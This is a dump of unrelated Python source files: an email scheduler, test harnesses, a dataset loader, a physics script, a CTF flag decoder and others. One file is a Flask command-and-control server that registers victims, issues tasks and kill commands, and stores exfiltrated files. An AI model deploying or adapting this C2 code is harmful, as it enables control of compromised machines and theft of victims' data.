content | type
---|---|
stringlengths 0–894k | stringclasses 2 values
import findspark
findspark.init('/opt/spark')
import schedule
import pyspark
from pyspark.sql import SparkSession
from pyspark.sql.functions import col, udf, lit
import random
import smtplib, ssl
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import time
from random import randrange
from datetime import date
from datetime import datetime
def get_spark_session():
return SparkSession.builder.master('local[*]')\
.config("spark.driver.memory", "12G").appName('EmailSender').getOrCreate()
def get_ingest_information():
spark = get_spark_session()
return spark.read.option('header', True).option('inferSchema', True)\
.option('delimiter', '|').csv('ingestor')
def get_avaliable_message(id_message=None):
df = get_ingest_information()
if id_message is None:
messages_avaliable = df.filter(col('processado').isNull()).collect()
return [random.choice(messages_avaliable)]
else:
return df.filter((col('processado').isNull()) & (col('id') == id_message)).collect()
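# A sketch of the expected 'ingestor' CSV layout (the column names below are the ones
# referenced in this script; the sample values are hypothetical). The file is
# pipe-delimited with a header row, and rows whose 'processado' field is empty are
# treated as not yet sent:
#   id|assunto|titulo|mensagem|processado
#   1|Subject line|Title shown in the email|Body text of the message|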
def get_html_string(header, text):
return """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional //EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">
<head>
<!--[if gte mso 9]>
<xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
<o:PixelsPerInch>96</o:PixelsPerInch>
</o:OfficeDocumentSettings>
</xml>
<![endif]-->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="x-apple-disable-message-reformatting">
<!--[if !mso]><!--><meta http-equiv="X-UA-Compatible" content="IE=edge"><!--<![endif]-->
<title></title>
<style type="text/css">
table, td {{ color: #000000; }} @media only screen and (min-width: 670px) {{
.u-row {{
width: 80% !important;
}}
.u-row .u-col {{
vertical-align: top;
}}
.u-row .u-col-100 {{
width: 80% !important;
}}
}}
@media (max-width: 670px) {{
.u-row-container {{
max-width: 100% !important;
padding-left: 0px !important;
padding-right: 0px !important;
}}
.u-row .u-col {{
min-width: 320px !important;
max-width: 100% !important;
display: block !important;
}}
.u-row {{
width: calc(100% - 40px) !important;
}}
.u-col {{
width: 100% !important;
}}
.u-col > div {{
margin: 0 auto;
}}
}}
body {{
margin: 0;
padding: 0;
}}
table,
tr,
td {{
vertical-align: top;
border-collapse: collapse;
}}
p {{
margin: 0;
}}
.ie-container table,
.mso-container table {{
table-layout: fixed;
}}
* {{
line-height: inherit;
}}
a[x-apple-data-detectors='true'] {{
color: inherit !important;
text-decoration: none !important;
}}
</style>
<!--[if !mso]><!--><link href="https://fonts.googleapis.com/css?family=Lato:400,700&display=swap" rel="stylesheet" type="text/css"><link href="https://fonts.googleapis.com/css?family=Playfair+Display:400,700&display=swap" rel="stylesheet" type="text/css"><!--<![endif]-->
</head>
<body class="clean-body" style="margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #f9f9f9;color: #000000">
<!--[if IE]><div class="ie-container"><![endif]-->
<!--[if mso]><div class="mso-container"><![endif]-->
<table style="border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #f9f9f9;width:100%" cellpadding="0" cellspacing="0">
<tbody>
<tr style="vertical-align: top">
<td style="word-break: break-word;border-collapse: collapse !important;vertical-align: top">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td align="center" style="background-color: #f9f9f9;"><![endif]-->
<div class="u-row-container" style="padding: 0px;background-color: transparent">
<div class="u-row" style="Margin: 0 auto;min-width: 320px;max-width: 80%;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;">
<div style="border-collapse: collapse;display: table;width: 100%;background-color: transparent;">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding: 0px;background-color: transparent;" align="center"><table cellpadding="0" cellspacing="0" border="0" style="width:80%;"><tr style="background-color: #ffffff;"><![endif]-->
<!--[if (mso)|(IE)]><td align="center" width="80%" style="width: 80%;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;" valign="top"><![endif]-->
<div class="u-col u-col-100" style="max-width: 320px;min-width: 80%;display: table-cell;vertical-align: top;">
<div style="width: 100% !important;">
<!--[if (!mso)&(!IE)]><!--><div style="padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;"><!--<![endif]-->
<table style="font-family:tahoma,arial,helvetica,sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td style="overflow-wrap:break-word;word-break:break-word;padding:30px 10px 10px;font-family:tahoma,arial,helvetica,sans-serif;" align="left">
<div style="color: #333333; line-height: 140%; text-align: left; word-wrap: break-word;">
<p style="font-size: 14px; line-height: 140%; text-align: center;"><span style="font-size: 28px; line-height: 39.2px; font-family: 'Playfair Display', serif; color: #000000;">{0}</span></p>
</div>
</td>
</tr>
</tbody>
</table>
<table style="font-family:tahoma,arial,helvetica,sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td style="overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:tahoma,arial,helvetica,sans-serif;" align="left">
<table height="0px" align="center" border="0" cellpadding="0" cellspacing="0" width="15%" style="border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 3px solid #ff0009;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%">
<tbody>
<tr style="vertical-align: top">
<td style="word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%">
<span> </span>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table style="font-family:tahoma,arial,helvetica,sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td style="overflow-wrap:break-word;word-break:break-word;padding:15px 30px 25px;font-family:tahoma,arial,helvetica,sans-serif;" align="left">
<div style="line-height: 150%; text-align: center; word-wrap: break-word;">
<p style="font-size: 14px; line-height: 150%; text-align: center;"><span style="font-size: 16px; line-height: 24px; color: #555555; font-family: Lato, sans-serif;">{1}</span></p>
</div>
<br>
<div style="line-height: 150%; text-align: center; word-wrap: break-word;">
<p style="font-size: 14px; line-height: 150%; text-align: center;"><span style="font-size: 11px; line-height: 24px; color: #555555; font-family: Lato, sans-serif;">Miracle Bot ©</span></p>
</div>
</td>
</tr>
</tbody>
</table>
<!--[if (!mso)&(!IE)]><!--></div><!--<![endif]-->
</div>
</div>
<!--[if (mso)|(IE)]></td><![endif]-->
<!--[if (mso)|(IE)]></tr></table></td></tr></table><![endif]-->
</div>
</div>
</div>
<!--[if (mso)|(IE)]></td></tr></table><![endif]-->
</td>
</tr>
</tbody>
</table>
<!--[if mso]></div><![endif]-->
<!--[if IE]></div><![endif]-->
</body>
</html>
""".format(header, text)
def send_email(_is_first_message):
context = ssl.create_default_context()
sender_email = "Miracle Bot"
receiver_email = "[email protected]"
if _is_first_message:
message_info = get_avaliable_message(1)
else:
message_info = get_avaliable_message()
if len(message_info) > 0:
message = MIMEMultipart("alternative")
message["Subject"] = message_info[0].assunto
message["From"] = sender_email
message["To"] = receiver_email
html = get_html_string(message_info[0].titulo, message_info[0].mensagem)
part2 = MIMEText(html, "html")
message.attach(part2)
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as server:
server.login("", "")
server.sendmail(sender_email, receiver_email, message.as_string())
mark_message_as_send(message_info[0].id)
def mark_message_as_send(id_message):
df = get_ingest_information()
df = df.cache()
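# (The cache() here and the count() below are assumed to force the DataFrame to be fully
# materialized before the same 'ingestor' path is overwritten by the write further down.)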
df_processed = df.filter(col('id') == id_message)
df_processed = df_processed.withColumn('processado', lit(1))
df = df.filter(col('id') != id_message)
df = df.union(df_processed)
df.count()
df.coalesce(1).write.mode('overwrite').option("header", "true").option("delimiter", "|").csv('ingestor')
df.unpersist()
if __name__ == '__main__':
messages_avaliable_count = get_ingest_information().filter(col('processado').isNull()).count()
if messages_avaliable_count > 0:
message_day_and_hour = []
message_days = random.sample(range(date.today().day+2, 30), messages_avaliable_count)
message_hours = [random.choice(range(5, 23)) for i in range(messages_avaliable_count)]
#Test
message_hours.pop()
message_hours.pop()
message_hours.pop()
message_hours.pop()
message_days.pop()
message_days.pop()
message_days.pop()
message_days.pop()
message_days.append(3)
message_hours.append(18)
message_days.append(3)
message_hours.append(19)
message_days.append(3)
message_hours.append(20)
message_days.append(3)
message_hours.append(21)
#Initial message
message_days[0] = 4
message_hours[0] = 0
is_first_message = True
while True:
now = datetime.now()
# Iterate over indices in reverse so entries can be removed safely during the loop
for index in reversed(range(len(message_days))):
    if now.day == message_days[index] and now.hour == message_hours[index]:
        send_email(is_first_message)
        message_days.pop(index)
        message_hours.pop(index)
        is_first_message = False
time.sleep(30)
if len(message_days) == 0:
break
|
python
|
class Test(object):
__slots__ = 'name', 'word_set', 'target', 'longest_subsequence',\
'verbose', 'actual'
def __init__(self, json_object):
self.name = json_object['name']
self.word_set = json_object['word_set']
self.target = json_object['target']
self.longest_subsequence = json_object['longest_subsequence']
self.verbose = json_object['verbose']
self.actual = None
def __str__(self):
return '{0}:\n\
word_set=[{1}]\n\
target={2}\n\
longest_subsequence={3}\n\
actual={4}'.format(
self.name,
','.join([self._get_quoted(w) for w in self.word_set]),
self._get_quoted(self.target),
self._get_quoted(self.longest_subsequence),
self._get_quoted(self.actual))
def _get_quoted(self, s):
return s if s is None else "'{0}'".format(s)
def run(self, subseq_func):
self.actual = subseq_func(self.target, self.word_set)
try:
assert self.longest_subsequence == self.actual,\
'{0} failure: expected={1}, actual={2}'.format(
self.name, self.longest_subsequence, self.actual)
except AssertionError as ae:
print(ae)
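# A minimal usage sketch (not part of the original harness); the toy subsequence
# function and the JSON-like dict below are illustrative assumptions.
if __name__ == '__main__':
    def first_contained_word(target, word_set):
        # Toy stand-in for a real longest-subsequence solver.
        for word in word_set:
            if word in target:
                return word
        return None

    example = Test({
        'name': 'example',
        'word_set': ['app', 'monkey'],
        'target': 'apple',
        'longest_subsequence': 'app',
        'verbose': False,
    })
    example.run(first_contained_word)
    print(example)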
|
python
|
numbers = [int(el) for el in input().split(", ")]
positive = [str(x) for x in numbers if x >= 0]
negative = [str(x) for x in numbers if x < 0]
even = [str(x) for x in numbers if x % 2 == 0]
odd = [str(x) for x in numbers if not x % 2 == 0]
print("Positive:", ', '.join(positive))
print("Negative:", ', '.join(negative))
print("Even:", ', '.join(even))
print("Odd:", ', '.join(odd))
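# Worked example (assumed input): "1, -2, 3, 0, -5" prints
#   Positive: 1, 3, 0
#   Negative: -2, -5
#   Even: -2, 0
#   Odd: 1, 3, -5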
|
python
|
# ------ your settings ------
TrainModule = 'OutputOshaberi' # your sensation folder name
device = 'cuda' # debugging device
# ------ end of settings -----
if __name__ == '__main__':
from importlib import import_module
from multiprocessing import Value
module = import_module(TrainModule)
func = module.Train(device,True)
shutdown = Value('i',False)
sleep = Value('i',True)
func(shutdown,sleep)
|
python
|
year = int(input())
if year % 4 == 0 and (year % 100 != 0 or year % 400 == 0):
    print(f"{year} is a Leap Year!!")
else:
    print(f"{year} is not a Leap Year")
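# Worked examples: 2000 -> leap (divisible by 400), 1900 -> not leap (divisible by 100
# but not by 400), 2024 -> leap (divisible by 4 and not by 100).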
|
python
|
from flask import Flask,request
import os
import base64
from lib.logger import Logger
from termcolor import colored
import sys
def main(mongoclient,server_logger,port):
app = Flask('app')
## Get the cookie/victim ID from a request
def get_cookie(request):
d = request.cookies
if d:
return base64.b64decode(d.to_dict()['session']).decode()
else:
return False
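# Example (hypothetical victim ID): a request carrying the cookie
# session=dmljdGltLTAwMQ== decodes to the victim ID 'victim-001'.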
def get_victim_info(request):
return request.form.to_dict()
## Checks if we are running on docker container
def docker():
return os.path.isfile('/.dockerenv')
####################################### General beacon and sends task ####################################
@app.route('/',methods = ['GET', 'POST'])
def run():
if request.method == 'GET':
victim_id = get_cookie(request)
## Update last seen
if victim_id:
if victim_id in Victim.victims.keys():
victim_obj = Victim.victims[victim_id]
victim_obj.update_last_seen_status_to_db()
server_logger.info_log(f"Updated last seen of {victim_obj.victim_id}")
task = Task.find_unissued_task(victim_id)
## If there is any task
if task:
if task['command'] == 'kill':
task_obj = Task.load_task(task)
task_dict = task_obj.issue_dict()
## Kill the victim by sending 'Die' and also update db
Victim.victims[victim_id].status = 'Dead'
Victim.victims[victim_id].update_last_seen_status_to_db()
return 'Die'
else:
task_obj = Task.load_task(task)
task_dict = task_obj.issue_dict()
server_logger.info_log(f"Task issued, task id - {colored(task_dict['task_id'],'cyan')}",'green')
server_logger.info_log(f"Task info - {task_dict}",'green')
return task_dict
## Default reply of the server in case there are no commands
return 'Nothing Fishy going on here :)'
## TODO: not needed, remove this handler.
if request.method == 'POST':
print("Command to exfiltrate received...")
if not os.path.exists('./exfiltration'):
os.mkdir('./exfiltration')
## 'wb' opens the file in binary write mode
with open('./exfiltration/'+request.headers['Filename'], "wb") as f:
# Write bytes to file
f.write(request.data)
return "OK"
####################################### Task output handler ####################################
@app.route('/<cmd>/output/<task_id>',methods = ['POST'])
def task_output(cmd,task_id):
if request.method == 'POST':
victim_id = get_cookie(request)
## Handling for various kinds of tasks, also passing the task/module options set by the user
output = Module.module_task_id[task_id].handle_task_output(request.data,Task.tasks[task_id].options,victim_id,task_id)
## If the output path is the default one, report only the part under shared/victim_data
if f'shared/victim_data/{victim_id}' in os.path.abspath(output):
output_path = output.split('../../')[1]
else:
output_path = os.path.abspath(output)
server_logger.info_log(f"Received task output for task ID - {task_id} , Victim ID - {victim_id} , Command - {cmd}, Output - {colored('File dumped to '+output_path,'cyan')} accessible both through host and container.",'green')
task_obj = Task.tasks[task_id]
task_obj.insert_cmd_output(f"File dumped to {output_path}")
return "OK"
####################################### Staging / Initial request from the victim ####################################
@app.route('/stage_0',methods = ['POST'])
def stage():
if request.method == 'POST':
## Get the victim id of the new victim
victim_id = get_cookie(request)
## Get the other info about the victim
info = get_victim_info(request)
if victim_id not in Victim.victims:
## instantiate a new victim object
victim_obj = Victim(victim_id = victim_id,platform = info['platform'],os_version = info['version'],admin = info['admin'],location= info['location'])
if victim_obj:
server_logger.info_log(f"New victim checked in - {victim_id} , {info['platform']}",'green')
return ('Victim registered', 200)
else:
Victim.victims[victim_id].status = 'Alive'
Victim.victims[victim_id].location = info['location'] ## In case it changed
Victim.victims[victim_id].update_location_to_db()
return ('Victim already registered', 302)
return ('Bad request', 400)
####################################### Client Error Received ####################################
@app.route('/clienterror',methods = ['POST'])
def clienterror():
if request.method == 'POST':
server_logger.info_log(f"Received error from victim - {request.data.decode('utf-8')}",'yellow')
return ('Error received, we will get back to you', 200)
app.run(host = '0.0.0.0', port = port)
def get_db_info():
if 'MONGODB_USERNAME' not in os.environ:
os.environ['MONGODB_USERNAME'] = ''
if 'MONGODB_PASSWORD' not in os.environ:
os.environ['MONGODB_PASSWORD'] = ''
if 'MONGODB_HOSTNAME' not in os.environ:
os.environ['MONGODB_HOSTNAME'] = '127.0.0.1'
if 'MONGODB_DATABASE' not in os.environ:
os.environ['MONGODB_DATABASE'] = 'SpyderC2'
print(colored("You can set these environment variables - MONGODB_USERNAME , MONGODB_PASSWORD , MONGODB_HOSTNAME , MONGODB_DATABASE",'blue'))
db_url = "mongodb://"
if os.environ['MONGODB_USERNAME'] != '' and os.environ['MONGODB_PASSWORD'] != '':
db_url += f"{os.environ['MONGODB_USERNAME']}:{os.environ['MONGODB_PASSWORD']}@"
db_url += f"{os.environ['MONGODB_HOSTNAME']}:27017/{os.environ['MONGODB_DATABASE']}"
return db_url
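# Example (hypothetical credentials): with MONGODB_USERNAME=spyder, MONGODB_PASSWORD=secret,
# MONGODB_HOSTNAME=127.0.0.1 and MONGODB_DATABASE=SpyderC2 this returns
# "mongodb://spyder:secret@127.0.0.1:27017/SpyderC2"; with no credentials set it returns
# "mongodb://127.0.0.1:27017/SpyderC2".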
if __name__=="__main__":
if len(sys.argv) >= 2:
port = sys.argv[1]
else:
port = '8080'
server_logger = Logger(logdir='logs',logfile='logs',verbose=False )
server_logger.setup()
db_url = get_db_info()
from lib.database import Database
from lib.module import Module
from lib.task import Task
from lib.victim import Victim
db_object = Database(url=db_url)
server_logger.info_log(f"Initiated database connection from main- {db_url}",'green')
Victim.mongoclient = db_object.mongoclient
Task.mongoclient = db_object.mongoclient
if db_object.db_data_exists():
db_object.load_db_data()
main(db_object.mongoclient,server_logger,port)
|
python
|
'''
PyTorch Dataset Handling. The dataset folder should contain two subfolders, "train" and "test", each of which has subfolders named after their class names.
'''
import os
import glob
import cv2
import torch
from torch.utils.data import Dataset
class LoadDataset(Dataset):
'''Loads the dataset from the given path.
'''
def __init__(self, dataset_folder_path, image_size=128, image_depth=3, train=True, transform=None):
'''Parameter Init.
'''
assert dataset_folder_path is not None, "Path to the dataset folder must be provided!"
self.dataset_folder_path = dataset_folder_path
self.transform = transform
self.image_size = image_size
self.image_depth = image_depth
self.train = train
self.classes = sorted(self.get_classnames())
self.image_path_label = self.read_folder()
def get_classnames(self):
'''Returns the name of the classes in the dataset.
'''
return os.listdir(f"{self.dataset_folder_path.rstrip('/')}/train/" )
def read_folder(self):
'''Reads the folder for the images with their corresponding label (foldername).
'''
image_path_label = []
if self.train:
folder_path = f"{self.dataset_folder_path.rstrip('/')}/train/"
else:
folder_path = f"{self.dataset_folder_path.rstrip('/')}/test/"
for x in glob.glob(folder_path + "**", recursive=True):
if not x.endswith('jpg'):
continue
class_idx = self.classes.index(x.split('/')[-2])
image_path_label.append((x, int(class_idx)))
return image_path_label
def __len__(self):
'''Returns the total size of the data.
'''
return len(self.image_path_label)
def __getitem__(self, idx):
'''Returns a single image and its corresponding label.
'''
if torch.is_tensor(idx):
idx = idx.tolist()
image, label = self.image_path_label[idx]
if self.image_depth == 1:
image = cv2.imread(image, 0)
else:
image = cv2.imread(image)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = cv2.resize(image, (self.image_size, self.image_size))
if self.transform:
image = self.transform(image)
return {
'image': image,
'label': label
}
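# Usage sketch (paths and the transform are illustrative assumptions):
#   from torch.utils.data import DataLoader
#   from torchvision import transforms
#   train_set = LoadDataset('./dataset', image_size=128, image_depth=3, train=True,
#                           transform=transforms.ToTensor())
#   loader = DataLoader(train_set, batch_size=32, shuffle=True)
#   batch = next(iter(loader))  # batch['image'] and batch['label']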
class LoadInputImages(Dataset):
'''Loads the dataset for visualization.
'''
def __init__(self, input_folder, image_size, image_depth, transform=None):
'''Param init.
'''
self.input_folder = input_folder.rstrip('/') + '/'
self.image_size = image_size
self.image_depth = image_depth
self.transform = transform
self.image_paths = self.read_folder()
def read_folder(self):
'''Reads all the image paths in the given folder.
'''
image_paths = []
for x in glob.glob(self.input_folder + '**'):
if not x.endswith('jpg'):
continue
image_paths.append(x)
return image_paths
def __len__(self):
'''Returns the total number of images in the folder.
'''
return len(self.image_paths)
def __getitem__(self, idx):
'''Returns a single image array.
'''
if torch.is_tensor(idx):
idx = idx.tolist()
image = self.image_paths[idx]
if self.image_depth == 1:
image = cv2.imread(image, 0)
else:
image = cv2.imread(image)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = cv2.resize(image, (self.image_size, self.image_size))
if self.transform:
image = self.transform(image)
return image
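# Usage sketch (folder path is an illustrative assumption): LoadInputImages('./inputs',
# image_size=128, image_depth=3) yields one resized RGB array per '.jpg' file found in
# the folder, suitable for feeding a visualization loop.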
|
python
|
import numpy as np
from perturbative_solver import solve_oscillon
from matplotlib import pyplot as plt
from progress.bar import Bar
############################################################################
# Edit these parameters:
############################################################################
# the values of the frequency to consider:
w_range = np.linspace(0.5, 0.6, 30)
# the Fourier coefficients of the potential. If they do not sum to one,
# another one will be added to satisfy the sum:
coeffs = np.array([1.0])
# the size of the spatial box:
L = 20.0
# the spatial step size:
dr = 0.01
# number of perturbative harmonics:
N_harmonics = 3
# number of backreaction iterations:
N_iterations = 2
############################################################################
# Compute power curve and lifetime:
############################################################################
def calculate_lifecycle(w_range, coeffs, N_harmonics=3):
"""
Auxiliary function to compute lifetime over a range of frequencies.
"""
power_range = np.empty_like(w_range)
energy_range = np.empty_like(w_range)
# iterate through frequencies and collect power and energy information:
with Bar('Processing', max=len(w_range)) as bar:
for i, w in enumerate(w_range):
R, S1, c_harmonics, S_harmonics, power, energy = solve_oscillon(
w,
coeffs=coeffs,
N_iterations=N_iterations,
N_harmonics=N_harmonics,
dr=dr,
L=L)
power_range[i] = power
energy_range[i] = energy
bar.next()
bar.finish()
# lifetime is only integrated over segments of decreasing energy:
lifetime = -(np.diff(energy_range)[np.diff(energy_range) < 0] /
power_range[1:][np.diff(energy_range) < 0]).sum()
print(np.log10(lifetime))
return np.log10(lifetime), power_range, energy_range
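# Worked example of the lifetime sum (toy numbers, not physical): with
# energy_range = [10.0, 8.0, 9.0, 5.0] and power_range = [1.0, 2.0, 1.0, 4.0], only the
# decreasing-energy segments contribute: -((-2.0)/2.0 + (-4.0)/4.0) = 2.0, so the
# function would report log10(lifetime) ~ 0.30.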
if __name__ == '__main__':
# add the coefficient to satisfy the sum-to-one criterion, if needed:
if coeffs.sum() != 1.0:
coeffs = np.hstack((coeffs, [1.0 - coeffs.sum()]))
log10lifetime, power_curve, energy_curve = calculate_lifecycle(
w_range, coeffs)
print('log10(lifetime)=', log10lifetime)
# plot decreasing-energy and increasing-energy segments separately:
for i in range(len(power_curve) - 1):
if energy_curve[i + 1] - energy_curve[i] <= 0:
plt.plot(w_range[[i, i + 1]],
power_curve[[i, i + 1]],
'b-',
lw=2.0)
else:
plt.plot(w_range[[i, i + 1]],
power_curve[[i, i + 1]],
'r--',
lw=1.0,
alpha=0.5)
plt.xlabel('Frequency (m)', fontsize=14)
plt.ylabel(r'Power ($f^2$)', fontsize=14)
plt.yscale('log')
plt.show()
|
python
|
from PIL import Image
from csv import reader
inputFilename: str = "./dist/flag.csv"
outputFilename: str = "./writeup/flag.png"
with open(inputFilename, "r") as csv_file:
csv_reader = reader(csv_file)
list_of_rows = list(csv_reader)
size = [len(list_of_rows[0]), len(list_of_rows)]
outputImage: Image.Image = Image.new("RGB", size)
for x in range(size[0]):
    for y in range(size[1]):
        cell = list_of_rows[y][x].zfill(6)
        r: int = int(cell[:2], 16)
        g: int = int(cell[2:4], 16)
        b: int = int(cell[4:], 16)
        outputImage.putpixel((x, y), (r, g, b))
outputImage.save(outputFilename)
print("finished writing to " + outputFilename)
|
python
|
import unittest
import ttrw
from unittest.mock import patch
test_dictionary = {
"en": {
"adverbs": ["test"],
"adjectives": ["test"],
"nouns": ["test"]
},
"pl": {
"adverbs": ["bardzo"],
"adjectives": ["maly"],
"nouns": ["ksiazka"]
}
}
class TestTTRW(unittest.TestCase):
def test_supported_language(self):
for lang in ttrw.languages:
s = ttrw.get_random_words(lang)
self.assertGreater(len(s), 0)
self.assertTrue(type(s) is str)
def test_unsupported_language(self):
self.assertRaises(ValueError, lambda: ttrw.get_random_words("xxx"))
def test_fake_dic(self):
with patch.dict("ttrw.words", test_dictionary):
s = ttrw.get_random_words("en")
self.assertEqual(s, "TestTestTest")
def test_polish_gend(self):
with patch.dict("ttrw.words", test_dictionary):
s = ttrw.get_random_words("pl")
self.assertEqual(s, "BardzoMalaKsiazka")
if __name__ == '__main__':
unittest.main()
|
python
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from numpy import array, ndarray
import unittest
from pyquil import Program, get_qc
from pyquil.gates import X, MEASURE
from nisqai.measure._measurement_outcome import MeasurementOutcome
class TestMeasurementOutcome(unittest.TestCase):
@staticmethod
def get_all_zeros_outcome(nqubits, nshots):
"""Helper function that returns the outcome of all zeros.
Args:
nqubits : int
Number of qubits in the circuit.
nshots : int
Number of shots to simulate the circuit.
"""
prog = Program()
creg = prog.declare("ro", memory_type="BIT", memory_size=nqubits)
prog += [MEASURE(q, creg[q]) for q in range(nqubits)]
prog.wrap_in_numshots_loop(nshots)
computer = get_qc("{}q-qvm".format(nqubits))
return computer.run(prog)
@staticmethod
def get_all_ones_outcome(nqubits, nshots):
"""Helper function that returns the outcome of all ones.
Args:
nqubits : int
Number of qubits in the circuit.
nshots : int
Number of shots to simulate the circuit.
"""
prog = Program()
creg = prog.declare("ro", memory_type="BIT", memory_size=nqubits)
prog += [X(q) for q in range(nqubits)]
prog += [MEASURE(q, creg[q]) for q in range(nqubits)]
prog.wrap_in_numshots_loop(nshots)
computer = get_qc("{}q-qvm".format(nqubits))
return computer.run(prog)
def test_basic(self):
"""Tests that a MeasurementOutcome can be instantiated."""
# get an outcome from simulating a circuit
result = self.get_all_ones_outcome(4, 10)
# create a MeasurementOutcome
outcome = MeasurementOutcome(result)
# trivial check
self.assertTrue((outcome.raw_outcome == result).all())
def test_num_qubits(self):
"""Tests that a MeasurementOutcome has the right qubit number."""
# number of qubits
nqubits = 4
# get an outcome from simulating a circuit
result = self.get_all_ones_outcome(nqubits, 10)
# create a MeasurementOutcome
outcome = MeasurementOutcome(result)
# trivial check
self.assertEqual(outcome.num_qubits, nqubits)
def test_num_shots(self):
"""Tests that a MeasurementOutcome has the right number of shots."""
# number of qubits
nqubits = 4
# number of shots
nshots = 40
# get an outcome from simulating a circuit
result = self.get_all_ones_outcome(nqubits, nshots)
# create a MeasurementOutcome
outcome = MeasurementOutcome(result)
# trivial check
self.assertEqual(outcome.shots, nshots)
def test_get_item(self):
"""Tests getting an item from a measurement outcome."""
# number of qubits
nqubits = 5
# number of shots
nshots = 40
# get an outcome from simulating a circuit
result = self.get_all_ones_outcome(nqubits, nshots)
# create a MeasurementOutcome
outcome = MeasurementOutcome(result)
self.assertEqual(len(outcome[0]), 5)
def test_len(self):
"""Tests the length of a measurement outcome."""
# get an outcome from simulating a circuit
result = self.get_all_ones_outcome(nqubits=2, nshots=1000)
# create a MeasurementOutcome
outcome = MeasurementOutcome(result)
self.assertEqual(len(outcome), 1000)
def test_as_int(self):
"""Tests the integer value of bit strings is correct."""
# get some measurement outcomes
zeros = MeasurementOutcome(self.get_all_zeros_outcome(nqubits=2, nshots=20))
ones = MeasurementOutcome(self.get_all_ones_outcome(nqubits=2, nshots=20))
# checks for zeros
self.assertTrue(type(zeros.as_int(0)), int)
self.assertEqual(zeros.as_int(0), 0)
# checks for ones
self.assertTrue(type(ones.as_int(0)), int)
self.assertEqual(ones.as_int(0), 3)
def test_as_int_big_int(self):
"""Tests the integer value of bit strings for large integers."""
# get a measurement outcome
ones = MeasurementOutcome(self.get_all_ones_outcome(nqubits=10, nshots=20))
# checks for ones
self.assertTrue(type(ones.as_int(0)), int)
self.assertEqual(ones.as_int(0), 2**10 - 1)
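# (Ten measured ones read as a bitstring give 0b1111111111 = 2**10 - 1 = 1023.)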
def test_average_all_zeros(self):
"""Tests the average outcome of all zero measurements is all zeros."""
# Get an all zero MeasurementOutcome
zeros = MeasurementOutcome(self.get_all_zeros_outcome(nqubits=4, nshots=20))
# Compute the average
avg = zeros.average()
# Make sure it's all zeros
self.assertTrue(type(avg) == ndarray)
self.assertEqual(len(avg), zeros.num_qubits)
self.assertTrue(sum(avg) == 0)
def test_average_all_ones(self):
"""Tests the average outcome of all ones measurements is all ones."""
# Get an all ones MeasurementOutcome
ones = MeasurementOutcome(self.get_all_ones_outcome(nqubits=4, nshots=20))
# Compute the average
avg = ones.average()
# Make sure it's all ones
self.assertTrue(type(avg) == ndarray)
self.assertEqual(len(avg), ones.num_qubits)
self.assertTrue(sum(avg) == ones.num_qubits)
def test_average(self):
"""Tests that the average is computed correctly for a given raw outcome."""
# Example result
result = array([[1, 0], [0, 1]])
# Make a MeasurementOutcome
meas = MeasurementOutcome(result)
# Compute the average
avg = meas.average()
# Make sure it's correct
self.assertAlmostEqual(avg[0], 0.5)
self.assertAlmostEqual(avg[1], 0.5)
if __name__ == "__main__":
unittest.main()
|
python
|
import graphene
from graphql_auth.bases import MutationMixin, DynamicArgsMixin
from users.mixins import PasswordSetAdminMixin
class PasswordSetAdmin(MutationMixin, DynamicArgsMixin, PasswordSetAdminMixin, graphene.Mutation):
_required_args = ["new_password1", "new_password2"]
class Arguments:
id = graphene.ID(required=True)
|
python
|
# -*- coding: utf-8 -*-
import os
import unittest
import sqlite3
import tempfile
import bottle
from bottle.ext import sqlite
''' python3 moves unicode to str '''
try:
unicode
except NameError:
unicode = str
class SQLiteTest(unittest.TestCase):
def setUp(self):
self.app = bottle.Bottle(catchall=False)
_, dbfile = tempfile.mkstemp(suffix='.sqlite')
self.plugin = self.app.install(sqlite.Plugin(dbfile=dbfile))
self.conn = sqlite3.connect(dbfile)
self.conn.execute("CREATE TABLE todo (id INTEGER PRIMARY KEY, task char(100) NOT NULL)")
self.conn.commit()
def tearDown(self):
os.unlink(self.plugin.dbfile)
def test_with_keyword(self):
@self.app.get('/')
def test(db):
self.assertEqual(type(db), type(sqlite3.connect(':memory:')))
